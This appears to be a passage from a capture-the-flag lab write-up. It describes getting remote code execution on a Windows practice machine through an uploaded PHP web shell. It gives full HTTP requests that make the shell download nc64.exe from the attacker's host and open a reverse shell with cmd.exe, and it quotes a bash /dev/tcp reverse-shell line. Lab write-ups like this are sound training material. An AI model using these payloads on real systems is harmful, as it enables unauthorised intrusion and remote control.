Skip to main content

Remote Code Execution

We can perform some basic commands to discover that we are the www-data user.

Whoami#

Whoami

Upload nc.exe for reverse shell#

Since this is a windows box, we are not able to utilise the usual bash -i >& /dev/tcp/<ip>/<port> 0>&1 method. Hence, the next simplest method would be to upload a netcat binary.

GET /portal/uploads/nothing.php?cmd=powershell+-command+"wget+<ip>:<port>/nc64.exe+-O+nc64.exe" HTTP/1.1Host: 10.10.10.228Content-Length: 0Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPnOrigin: http://10.10.10.228Referer: http://10.10.10.228/portal/php/files.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCUConnection: close

There is a cron job which deletes any executable from the uploads directory. Hence, we have to be fast!

Initiate the reverse shell#

GET /portal/uploads/nothing.php?cmd=nc64.exe+<LHOST>+<LPORT>+-e+cmd.exe HTTP/1.1Host: 10.10.10.228Content-Length: 0Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPnOrigin: http://10.10.10.228Referer: http://10.10.10.228/portal/php/files.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCUConnection: close

Obtain the shell#

Reverse shell success!

We can then continue to explore the Windows machine.